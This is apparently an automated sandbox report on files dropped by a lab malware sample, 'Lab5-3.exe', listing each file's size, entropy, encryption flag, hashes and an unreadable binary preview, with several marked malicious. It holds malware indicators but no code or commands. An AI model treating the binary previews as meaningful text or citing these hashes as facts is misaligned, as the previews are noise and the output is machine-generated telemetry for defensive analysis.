                                                                                                          Preview:..o......2.fw.#$.[......di....p..#.......E<.."......;......g......g,.....^.FxA.kU..fZ....4...<....@Y...C..X?T.n.. ?]v......@l..D2 ....?>>...D)G..W.@.K...2.*pw.G.:...<.;#..........J..N<.8.]..k..2.:|s8..<a.*.e....C.G.[".....d......-zz..,+...VD..B.~.....izyw....X.).0V...N.uL1..z).l3...[...,..S.!2...uM.]S7.N... ..n.......Y..9....x.5.....jn!..q..K.........x.g.W./.8....y.......=..oT.PH...z..x.4h.h..^\...gD1..gI5A..|......GO.`..".$....fB.y^.a..;...3y... ..h...%.0..D\7.f..4Zbm.....6.[;s[.....aAy.e..@.L....gd3.Y.e.....[.5H.......F.0.b..!ni>cw..<..;...y..[.!j. ...".Y.%.0..'y.&.P..$.@.b.......{..5........N.I h2..U....v.2.+.b/p.>.N*i..8...l_N@......B..k....=..y..eW.#..<.s....QH8I......CTh.h..%.#...>.2...&..y..".u.....+R(.H.....j.r*-.......bH.x.:2...;.T....Z..F.*...\:m....}H...L..e..F..0.C.+....cb......F....B~..n..s...j.L)B./..=......+.P5_w..|..B.8...'.......7.EJ....J...'.....yn...P(:...$\.....r.-.Vc...3..H...y...K+.....E3.d..X...%.y.A....gI...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64816
                                                                                                          Entropy (8bit):7.99737206197815
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:RnDmamNgdCagn9z7E624/PY2t3JaDadQds9fX8aMc842cqZ:RCx9tA62OP0DadO0X8N0qZ
                                                                                                          MD5:9DE48C5E0E02504272BF0173EDC99218
                                                                                                          SHA1:DE63D4E1D266361D76F66DC52F8147F09B7AE8B6
                                                                                                          SHA-256:2EC35A2229AAF64DCECACC525F07F92D22DA735714C8AB300B156729DD126277
                                                                                                          SHA-512:026C787842A634FACDF2ADA16A19692E044C67011B4B132E1270E2E38CD645CAF79E5E1F0D3BD4E7AD4218C0169F173432F15F12E67B0D5290720EBE328027C2
                                                                                                          Malicious:true
                                                                                                          Preview:....LZ.7kq.o..F!1.*b.g.s.A..y..$.S.J.O.,k....'..'.e\.|.CS..Z;i.......ZK.a_7.P.]-.mN.`....J..Sw...9..u....0......GpC.....p.....~&.e.Y,..L..\.r..1_....U.b....}^...M..h.....`T.....t|[..1...E"..A.z....v...8R......~.7.........xB........K....S5.....Eb_...........o.B.q-..i..b.F...................8.-.+ Z....L...p.T...A..0h..5.,5.V.5$.K.v...y....?k.=4dS[... ;-.k"E.X.@....6..G8%.LA:F...s....`..fCw.(........@..,....yS..-.M<..|.....P....V}P@.......m.*.V..s...n.d..}.r.x......f..01+@4.....x.q?.]...&........29=Xj.....bd...G.....5.C.2s...|.$.......|D...if.....&...7.EB.FH..b.}.V....$h.....l.C.&....5....BN.......:.,}@....#.jF.y.....t<.eC>...%i.D..\.0[@.H.i.t...."&.R%...[..#h.P..eQ)..F.....A.h..3EK............MX..0.yz.....,E...$\/8...<....Q..O+......X..x7.h.l...-TEkYaB.=.d<.e....}...(.u.}...."...y./...\.Ya.7....a..:.[...H......Uafv..p.r.Cd.3.P.v.w.h_....V...FQ.8..(.C.Z4.'.....#.....E.GBy.....3.."4....$..)..YW.L..$.e.7<...@........A.....c.@......,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):143424
                                                                                                          Entropy (8bit):7.998807353710823
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:T8xFsfRCoARIN5I76ghEbllKPkge5SlFig/puxVFmMtv9T2Z:T8xF5rCEqCPklQlFigRuTFmMtv9CZ
                                                                                                          MD5:696B9CF064728F59D2CDD6FFDA0A8F55
                                                                                                          SHA1:F454546F5E29A079013D3D58FF49C99C6A8F5885
                                                                                                          SHA-256:C66B93B1FBA032A9A199315EE224E377CCF071081AB539FC3C9D38B790A5D2D2
                                                                                                          SHA-512:B1DDBA5FB5DD69CC60C0425B173257A7BB833D9218E56D72E88056E612AB8EE5549EFA31252AC2EE3234B617D74A0C8830F630C860F580AE562878D9DCA29F0D
                                                                                                          Malicious:true
                                                                                                          Preview:.l..2.}.Qc&SM6E.....7..o.V..Gp.SL,o..B.G...j..Z...]$K..$(..G!.L.=.....K|.p.....`y..:."......dM...;p-..pl.Uy..5..eX..mE.DU.r...s..M.>.<j.......~.q.c<ms..|.;.9E.Q.~~....l..-g.b...]^--g^.+..A.x...i".K;.*.xY.......e.._%Qw1..<....8"...'...O......n.........n...4[!..0..........M-...A$.....4.......%.SKP.......Q(..W<....4.-0.L.Vx.=x. G...cP.CF.<.ET."c.q..6x..........5..tBB.OHB....?a.{:!Q...q..yh.Mu..wz.v..??_.>>U.........\....B.#3A......7.)z...r.....`....}.. T...&...7.l.......J.......j......1\.4a..;.R!.a.y.3..D....u.l@.al.O8.>.E.|......W.x.....`>.....N......_.....l.$.L..av..=..[Xp/b<...c'.|...0....'..'Co.@B...6.....4..yF.. .q.{.?-BW....c.....g.E..|r.x.\...4.:>|.........\9.......j.....3r.....F.<.`p....$.....V.u...[Mf.W.<.2...(..+..=... ......q3=..|.(.v.....L..p..|......A....N..H..,.g..].F.D....O.Y.|.r?bG..........h....-...A.[.C.w3..4Vw.".}.......d........@....#c...2)d...y.."...*%..lm.DX^........+...u%...G.........U.....W....i.\..N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):235696
                                                                                                          Entropy (8bit):7.999282089701212
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:M2DExCDhk04v7xggw6o9jrJl7iteQZteuS1doHTx5VZIZ:PnCnx/no9jd4efdoz9W
                                                                                                          MD5:678536DA3668F8B0BDADD9F4BD059CC1
                                                                                                          SHA1:8BEBF69F9ADAB09EC48635C82C5B4D55AB2CCFE6
                                                                                                          SHA-256:7D033BF613EFEEBE5E16E419E314633DDAD846560AC411AB59577CA3DE640EC1
                                                                                                          SHA-512:21FB4FF4951A34A36D96873FEA4849BD312B8CE384E129B7F5675A8D72E61DE299B807101916D4BFC913846A32D9711B0937C580094C2E22F43B5B79A41E3FA1
                                                                                                          Malicious:true
                                                                                                          Preview:.SD...?#.L....Zt..S..,.k..0..V.M.,.r.......Op%!E,R".&.@........../.._k...q3.G`....T..!E.....E..."pxd..}.78..-6*(v?.>p-....O?/.........<...#<..9.>.\Q.....X.Yb..<.....} 0mg..q..T..@i....@.$~..B...kx..........w...'.e'....3..G..Kx.D5....AJh.|.;..|....$..|.C.T...}....2R..W@..!.].1.....5..U..-Wh.J.T....E.....^.`..9.V..,...w.a.B..VI.@.NU1..v:/Q..!%.H.7........i.>4.=t...;.r..%F.5....D....0...0{...K..'.....^r.~.......;.0.A....m..ii.....OB..EM4...u8.N....t.D..lK..A..lG..o.c.G8.$=K..(.7....B==.1.Gp}.x...:$G...."..qz.Z!.;....y...nZnT...RW.!..?LK3.(.,.%.6.<.S2.4.R.S.[...L.]l.....q..q..ns..:...0?./D....~....d.(..oJY&......T..{..m...c.M......./|'..>.`uH..)o\)..s...I..N(.O..........J..r.../h^.|...xy..'..#@..."D5.J....;sY..~..R...+>.iS..z.V$.^..C.,.K.sf<~|^.....~i4F..._.g`...#....F"..1... ...D....x.......P.0i$.VsH....p%f....;3...|..<C.<VWj.0g$......_40.{=!^..N..k,........q.O%xU!C4..'(.....y..@.=.(...=......nn9...y..<o.....n.G5Y...!.k.Hms..,.P..G...g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8352
                                                                                                          Entropy (8bit):7.980953347625099
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6erGub8F7oiVABL4mvBDxV/T7nVegqM0Cb:664kiVABrvZ3T7VJqMtb
                                                                                                          MD5:57B424CF846D5C8A772F2F308227C062
                                                                                                          SHA1:C301C34923AB2391805C5EC54148E7120B48D093
                                                                                                          SHA-256:E351B0041C2AEBC9F4139B0ED4D81101D7DE78B845ACC1BDD1F8938E1D016401
                                                                                                          SHA-512:0E79C906536BF46BC738CB6711FDC37A686D8389BCE2DA1A82F86B33775A156AC4AC9DC3DB5AB5340861F6700A394727555B34930C9FA35CA885523D2430253B
                                                                                                          Malicious:false
                                                                                                          Preview:+A.&....!..\...RM...Y.1.T..+...*..p..aD.w..T.W).3.3......D..g.|.[...!."yi.L...g............!......J.M..D.2...Jz...~.SP....lK.pXJ!.^..r.aY.......N..r..A......@.77B!.......g....p.....C../.\..b.^...N`..-....T.......cj.w4.t30.F.~...j@..D...m.......e.....|2...o.}..Vu.lP.X..?...<[.<...'.........^I....v...=.&..x...e....6B.Lvl..F.kJ....5"SlQ...J.WZ{.G...._.....8.w.h.-. <>q;,........>PPd..?..........k.`.SI..Y].g`.''r$.m.t[....qe......\w.r..X....W....%.\.o.s5..$....-.KYQ...*=.......WD".L.aja..i....ys.t1.[h...]H......I...p.}..=TY#,....(.o.+.2p.x...!..ao_( ..o<<..dl._..9.x.t^..s.g....&....4....n)F../D%L.7.qp.....0lewuxeC.s.A..3..=...4\).HY.H...[a#..Zz=W.P.C..y....H...;.N....v.b.AS.)..n. .............~..[..Z..o.Oj.R..0..rC.F...".GT...H.`.!...~.7'9.%]f...z.;.v.dFA.6.3...o.e= ..."r...*..-Q..,.>.c.....'4`.C...d....`|..`....&.Tv..R...#.)..}[3~<...{.xj^...f......"..lW.@.Y........:.~..".../..W./.@...Cm.B;.r.E........,........v..{d;...}'.}.4.u.G......{.:q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16704
                                                                                                          Entropy (8bit):7.988351654524631
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:9rJZjsXFxujFgCb3S1uDA+PPCOL98sLtb:JJZoVxMeCbi1SPCA9LZ
                                                                                                          MD5:4316082E81EB78C443ACFCCD63CA3345
                                                                                                          SHA1:4EC91071824E91B6CD2D27BCF93ADD8AE27AA256
                                                                                                          SHA-256:8DFF252A9DBC5FC1DFB21BC7632A36FCBF825EEE3D66DB2C05C5E79837C2A790
                                                                                                          SHA-512:B269A7138B5693A632770E39506C3382E8452A4A589A22FE88FC35C5E70BFCB52A2EF6E6A219478A30D9269FC4FD571E018C1A3E951257FB32B44209592E611E
                                                                                                          Malicious:false
                                                                                                          Preview:...gO.xgg....r+...z&p...B.C.>.G...T............y5x...`.......mm4.B.+...l.i.z....R..O...6O...|9.R2H.I..Y..A.,E_.......$.O....v.^.U.Y....7qt'.......*5..b.r.<....S`..hV..|+..3.^y.. .@..;...E.ac....@..`)gK.......v..b9..x..}#..Kk.... m<..U.....*+..j..Gr.U]-.....]..`.....9.9.z.M#.Q...i>.....E).u.)fS..K[....*..yY.j..12.R+...U\.Dar..I...3xZ,B".oV...n*.VB..^.q"S.R..|..$.k..~....b. E.18u.%.%..9...B...nq..z5.*..oc...q.......D..._\.xA..7.T.#m>{......)7..;.JF<.Y.Q2...#U...V.|....-q........0~kU...'...B..6...........M.....$].X.n.........?..."R.C.|...PB..`.[m....}......3.L:s=..;... ....G.T`d..O....G[5..h.......\.......>...b.$q3q....$.Z......uN.....R}...R....9.....r.....Df.$..3.ff.H5..Z..tY...e..]...}......WQ.l......5.."........,S...\....V.`..K...{A....$.C.}t..)...CpP;....P`..V......6Si.<......:......2.G..4....m...f...c.dMX..t..P M...='p....O..ya`.....H.......7..Q.A.e..+..&ya.Ct.a..O..Q.......W....!T.I.....o.Stj..e|.".~.*.....n^.&+....v...&T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8272
                                                                                                          Entropy (8bit):7.977053803253376
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:88UyWKVMYEDEBPGHLPBoKfZkVjNTkK5vLySnXHoX0Cb:syWKtEDeP0L5tKjVHNHoXtb
                                                                                                          MD5:87DE7A4C4AE65641A9F07DC99A8648BF
                                                                                                          SHA1:7E00B0721DCDFE5F6301DF86DDA979AB1B8D5824
                                                                                                          SHA-256:2A3FDB75AD4338A74D0B7F9DBDB6FAE7DFB22CD5E710452973B044E6D57A4B36
                                                                                                          SHA-512:CB3A1AC8069AC6521A27964345D55107F92024102ABB040D3FF004214BE58DBE2C30D9D6F0D2361D10195D48A835C48528FF310FE49CF3E0A6A39312727D39D3
                                                                                                          Malicious:false
                                                                                                          Preview:.......>.(...}8/l0...|2.B.+cN...yM.F......T.P.+.......@..|m.!.(...._.7.....?.....fn.(.... .;.#$......k./6.*._:+k.*..".C.)2....0Z..n...;....F.o....G...x..../..r.=....L.:.:.5.^*\.;...FDm.JxU....k..(....;..G..3.4q....gO.0......\.}.....1G.cP.>.V..c~2.....1..nz'...Rq.+...M..UP.]..p.A..oP_.*.....#{c......@.y.9..VzqE.f. ....a......dS..Ii.N..M..o..|.*....|.Kj..^.(.l...!..Na...w..A.X..gd.v......V.....E.h..W...K......[..&........$...9.@UgE..@G.......%.q....O....?8..Pg.._...`.>VExg|r.....k ..ZP.*.]G.mG..M...t.N...i.....ZDOF.\..okQr...........w.C..[.?(c....q..4....d....J...J...Up..J.u....2...e.....u.j@m...Z..X.v...^).di...........f.S.qz}Vr...].`..s.E.p....,gr.k.I.tx8>...E.?...Q.......>6..N..D...0.b..G.....r.U.Q...o..#.A^....b...#w.%..M.eA....d..K.........._.,[.e*...X...~...KW.v*H#%\Z^i&~j8......g.wR.lQX.....!..K..'.h.~C..KK.'.o.......Sw.....G....xE.....vb.[)#[..../.....+.W.l.Ahe...qa..4P.r.6.:..qu.^G$....N......7..1zu..... ?..'...-..^E..U.pj...wS.D.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18000
                                                                                                          Entropy (8bit):7.991277445751742
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:ZIziFlKkId+LHBnG65uXvoJ19HRlkdkbiYo5GYnFP7Omtb:ZIzUi+Ll5cQL9xkkbiYybZ
                                                                                                          MD5:A43CA4A8A956D510C3F11738EC7B319B
                                                                                                          SHA1:CDCC723C57C667FD09610129AAE01664F88FB05B
                                                                                                          SHA-256:8D0C8223898DB0355B352DB8F6BC829F114EFE8A84A11813349E4E46484FCFC8
                                                                                                          SHA-512:E1FF60D26A21EF9003884CF07A8D371F7ABF5134945CD373105A33D3820C05D11947BCADB3F64C7BF24502C21C0DD743421F3C58881369E3CBB094812717ED61
                                                                                                          Malicious:true
                                                                                                          Preview:^M..^..r.....^...N...,%...>.......YA......^.PE^.y..|..|*..zIG......r.$...4..N...x..1....F..&.+,..o...0.>.&%9.y.P M.........y.B..47.&V.F6.Z..T _q..C.o....<!..u ..e'.......?..........r..o-.p..:.....d...;..~../sq.{...........4..DQ..).kvkK.....(..l..>sV...%.I_V/9.... X^..~T..G@^.`....V`..B..".J..{l.a...r......L.e0...j.C.?....... T.b4.v.[X..L..0.Pm.A.t!.Z...........uR.]h.5/..1..%BXo..`..v.\#.u.N.N].r|..b$.4.........b..W.............6@../.r.V.|..n....`F)2{.....L.....=...+..u..........Y.fyT. S3\S...8<D_./..-T.......u.M.1....\...>.UE...C.<5..F.m(..I.q.~.5.S.?g..cM....*d...G.l..+..]...&a.~....u.2..P:K.D.;N.C......c..ch.....|....(.s....sRcaQ...m..........Q....+)BD.zk.......x^.7..2.{K.,0Tv-#Z..o..7..w6i" .*......V. ..O a........K/...+.9s...-K...oX.J.(.}5?..h-..Q .O..;.4B".....C.R......X.zH...L.u.&......e.'2.8.'J....uj...M..l....O....J.Bj;.~../e....kR....N..l....V+....$.)u`..s..!.\hAM@..w?'.G...kc.7'..........(.Xb.Gm..MN.xvoP.."..xVuz..%E.9O..(......|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.904448692452477
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aMiaEHK4Z15+4myHfUTid3hBaUoSGFcmeykEdEElU92i:Uafu2tGx0uKeY2ElUJ
                                                                                                          MD5:33A46614575ADA31054BAE933F2469ED
                                                                                                          SHA1:04628E4C2E93E922974EA56869574C559CA1EEBB
                                                                                                          SHA-256:1A4C9259214E8E255CCC78A9EAE7B5582113BFC467D7BB878AED4ECAC7638548
                                                                                                          SHA-512:6C05D41758EFD86ABE588105040844E6FB7341561DB8DE1B24D30D85977A4719584DB8AB22911FE4D9E6C10A229FFD7BB4639BCD23B2646331B0FFD0B4427C78
                                                                                                          Malicious:false
                                                                                                          Preview:).0t$.........(.eY......O'..5d....62`...C..,..r.F..4.-...d...<...i....M.3.*i.......=l.Le.E..M...3.|...;.Y\...3..c..*....7.pX.\.X.*..F...c9.goF...*.m..v...Mk}..#lOb. -.NCPj.~.....R.q9xj..5|..i....?....6..vf.7..n`......'../98..bAm'..>.x..&........L.._.........<K...@..h.w.......PP.%:...l..].A...J<.....8)..F....B.|.c.y../...,..q.?.....\....6>.0.U..p..*r.y.p.....X.1.!..pd..y..S...%{.......[W1...D.v}....<A.l%.U.:.....0.........s.*..x....g`.......2....O*...4.$..@$...q....._.j...Q.q9........=...$._..Q..............C.*l.>.p..[Bq......dl.h...g*T...<..ia.(...I.W.......mNa"6R..f.BE...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.9196371499762
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Xpk8iFFq4qOJbzA8oGSxPKbTjbvC0HfUTid3hBaUoSGFcmeykEdEElU92i:X+rFq4HbzJqdOjbuGx0uKeY2ElUJ
                                                                                                          MD5:714F8F73F545E37DCE3856FBEFF8069F
                                                                                                          SHA1:6ADBEDDECE2F7627CDDD4A5AA63A8908A6EEA2FB
                                                                                                          SHA-256:F65E4C2CA3668A4AC1D317BBAEA270E20971769552299C97F942E66D784AF2B9
                                                                                                          SHA-512:292D3AFB6C3F126E59EE6022DD1675C4BCAB8EBFC39F0142657BB0A6D095F8BB0481FE50020E32312D7670A91C503DFC1544F5CAC16EBD262498CC24189BDA0B
                                                                                                          Malicious:false
                                                                                                          Preview:...)O....&:.....j...........n.W..g.......-#N.w[y...R.....J.zLOo%..^H1..|0a...5.....N.. .......r.k.9.....L.F....Y.9./.4.'-fi....F..NeP.<\.b..c...G...N.|....8.S._h....z.'...=.#.3.|....3.IvZ.M.6~..xn.o.@.>..O..N.:..X.0.'3..q....s.M.E..w]...$.....'..<.......*.@#.7qV.>~.?.(.....*R..P..Q...)K..E.jP..]..../{.J_.........$m.b|.e..Bi...m.O..!..UyD..(..{H.~........o....'E....<w4.M..0^.i.oeS...e~..m..<..AE.b.&.>...W?.'..........r+..w....q`}L.}.K.s.Cj.i...M!.%....<...[11.....3.U*.K>.kB....,.N[m8...T....l.....G.0d+...Z....>......r%..~.hz.q./..CG..9.D.....V.6....3...^.C.k...5H.\...;.*.>(...z..H.>....$.....E....L.[...;..;.:E......-L..B......].F.)"L.qU......IWp.(...fZ).............r9Q....v~.].J....&.V...YB....A.n...6P...Z..<.+G...Y{.K....Ri.GN2ZZ+.P.-N. yEk.S..^..e8.2..T0%h..$~`.S.h..=R....p....vDA.9.NN.|8".Y..#$......Y....Z..5...N.5..:..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.896818826109341
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JbDq0ONM8ZHfUTid3hBaUoSGFcmeykEdEElU92i:FJGM8aGx0uKeY2ElUJ
                                                                                                          MD5:EEBB8DBADFC4EC9EDA619175B4788CDA
                                                                                                          SHA1:5C8E5FD9621311BF0978B8677BCA2258A5183C71
                                                                                                          SHA-256:A447BC2C016FCA399A7ADA64EF57EA42D35BE6B01B15FA33DFE6509C95D60D3D
                                                                                                          SHA-512:882CFBD0C5D5430422B8A976F2F92341FE883B60BD545DB3F84359FCFA75399B27F051B32C8F92F5F8833338C002F1C5F2CE728160A64783FEF89AB5157D396E
                                                                                                          Malicious:false
                                                                                                          Preview:..=.(.im..[..j+...L.@<.a%...........|5X...m..,.3....q`1..S..... ....9R.0.a.'AQ.y$.%..9.>..K{.k.u.....8.G.....6..Y../..L.=MLp.p.....,.../X.q.|..\.....=..Y. ..h^.^w.....[..>.h.....:.>mQ$y>.[ i"...FK..tB..A.j..".PS......Z.O.GU5f..F.z..(>.C..sC..E...-}j.bv..h.)...E.3...$Q6/9Nq.&...y....9J`...hYa%...-....;P.L..Fd....e.z....)FV.V.b6$...W(.c5.0...).zx....I.?...M.".".".T..g(.0.L...kQ._a.}.+...&...G5..).W..N.....s@J.um...Ut...k.....q...[.F..XTn..'?.@2.......{[@0(....z5.....92.jB..g..<.L._..o..........:=...ItGG|L....w....DL....j..[iq....-..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.916356932183981
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8sDtDnBuml8kWkxcYVuALHfUTid3hBaUoSGFcmeykEdEElU92i:8sZTBuU8JCzYrGx0uKeY2ElUJ
                                                                                                          MD5:4C40EF4FF527B5221A1971AB9521B465
                                                                                                          SHA1:75C01423BDBC1EEBBD796B1CF8C0C600BA5EFDF8
                                                                                                          SHA-256:8425042082447465D8CC5C8AE5A0D6EEB0E9EFDA5D26447D12E27300D458BEA7
                                                                                                          SHA-512:CE6A50A0B003042CFE86AAC1BC39F08E4736E747EAF6DA9700AB5E57FA6B52AE74F39E5D21AB0F621DA732158F6857CF201BD4C88E14C8DCB11AF42C89425AD6
                                                                                                          Malicious:false
                                                                                                          Preview:$.|.2...k..#..u.H....1.T..&.^.4..C..F$..z...J=-.l .....\,...l.).0.gb..k_..n.B..-....lE.!......F.YV.!.b.O.~...M.0.....8..[>.TZV.d.H..)8.........u}......Z...2.....I..7A..~T...b %.....f+..-x..X$*.....1...%...nd...Z.m.zM%...k....V..,.+.J..F....>..c.......P3p.M...4....Qfo7KJ,.N....N*..fM..eb.9e.U.......o.....qT$.~...W_#J.)s@.....55.C..!jos9r....;~Y......8i.f|./.#..[:..:..o...KmA....^/..'A....=...SdB...n2.-...4......~.....$1muy.......V.....a.`..`.YX[zY....**. S$......a.,CJf0+.y1.Fq.7z.i.u...H..9.I.7.....k]R..2....>?.?....^..l@.;.B.,.#..hN.]i..L*.Yjb#Y]y.xa...ylg]..1.='...gP..?...p.t.;w.E.\.Y..&....L..WP.....d5.;q..e/I....3.A+U`.....Y!...v......A[.S..W.O5...y.wb..k......lB.j...\........y+..2.)'.Jj..Y/'.Bv &..ZC.........[.D...W.A.B.@j..!./.uI../x......Vw..ex..7....F@.. <..R..B...G|....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.924380723701623
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yD99/f0GHXAN5HcaVQJETIFkDZX129TRAvHfUTid3hBaUoSGFcmeykEdEElU92i:G9bHXI5HlrTDSdA0Gx0uKeY2ElUJ
                                                                                                          MD5:214FB55BEBEE7000D3A6F38F04D3D150
                                                                                                          SHA1:9C47A9CF0399B76FACA74E8F9B2B5CF9EC4D3971
                                                                                                          SHA-256:622FA40D25C6722C64C0281F89E3C817449A19437F605E96A78739C5FC6CAEE8
                                                                                                          SHA-512:105AF8CFE75F623CADB4892721E1E1D11064679DE02AB71440E0A50866966B73E2540C5382079DB96E5A818260585CC2E66815549EFE40D3AF444F1B32130713
                                                                                                          Malicious:false
                                                                                                          Preview:..&.. .....u..g.A.x...>..........9e5....V...s\.{..c7F....qL.@}}re.s....~<+...G...c,h%W.aEQQ...yb('.....\.J..w...m.T...g.....!OONQ..tY.`Y.!.<..a....n..YA.;...Y....:.........K..' Q..b...S.3R....ON2.....J...T.'....Si..G{.....W&d.T..T.E...z.j.qr|..........$u9.-z.........~S3.u.g..bK.|!.63..AM.D1S..l...46.=...#.K.{cR....q+.........*....!..%....F..M...mz....Nz...*......r.Z..".....c...0p..t.p..|..2...C..*`.H1 .e3=.b...>DL...V.V.'.........$.b..1.P.>}....."..?......~......<..H....P1.........2....'...BU...n..#.|......#..[&^@N......2u.so..=...../..Btj^o....@Cq#MWL.X.5...!.j<N..3N..Ou......g.=._..F...."..[.&b.g...2..E~.......z..FhZ.2@...&+...Tj.}...,<...e.....o1.o..'-..Jp..*A..i.(..J4.2.+.m....i....K.....7..0...Vr^..W..........~....7..I}.....c.g>'>..Lh.......P...%d..l.n..(.c...k.W.U.....{.......'..t....zi..v.w..l.$...0.......$...c .y......[.M.S..a....H[.....1I\7p]<.#|..4..'..n`d8}......2..)...Fn......?e.>.l..F..*...R8..N~...T....?.......;..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.9417896689279175
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:DdVYukBvyru/nO9l7L7BT3C5Gx0uKeY2ElUJ:K5kufOD7LNT/0Cb
                                                                                                          MD5:04B9122FD9A0DE833AC9889E0EEB3A4D
                                                                                                          SHA1:F9369264A1CA8563672ABC6111BD2D067B10DD13
                                                                                                          SHA-256:1359621EE5C90C7656C70EC36DA84483CCCCA78CBD91344A2902E392FA422C04
                                                                                                          SHA-512:A1396859158B34A71E106B1E1BC9A2651545ADC5686DA02E4731484FA76D4BB49366B9A98DF71F9ECE85760C16390E90E21EF4E6FCBF6E991A86C513AD8B5A90
                                                                                                          Malicious:false
                                                                                                          Preview:......1*...i'..'s.s...T.Ru.?w.N..[........_n.XF}..d...[|..7....$Q....a..~.h.U{.n.,.=...!N..C._..a..P.[..2.//J......&.....Fz....BJ.p'n.... .x6.:...D...3..PB......^.= ...5.....Y..$,..-"f..<....|.h0.Q...Y*c.:&Y.A/....u..'..__.....yI ..l ..]....Nfdrm.Q.._..7BL1....{...x;..!..._..L.|.U1.|7.5n..'..:./.(...9.O.7$MZxH..Ii.X.4W......"]..d..-.h.8b.zW)....O._........E.u.].nR,....U.U/...tF^...g...1Z.......W.....IS....).c.........e....@.........z...S2zK.q.....PG.. f@.P$...D...........59..1L.O..}....3"'...&=*.......%<..V..U^...E..1N.G.7...^1.....}.S...\....j'..y.6..s..F.i...m.D9..pJ#.]..I.|....=*h.4..&..'.l.hD.....-....!.m...}.CJ8..T[..?.`...c=K.x.l.k..s."~....f?>.{....}.ou.......P...R.i.....F3.e.g1....I.me.r......}.Cb.(...8.....{.....w..v;....t.=3....nk....A....e..x}..p..BC.Z9.B._...&.......u...^....Iz.;...'....i{[...dm.A.y.oM.X...!..j.!........NwCxR.w..d<.{.%#...'6..VP>..:.......Rs...rh.\Q.s'<...w!.....c.`...;..GE!.V.....\....)\.......h.E.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
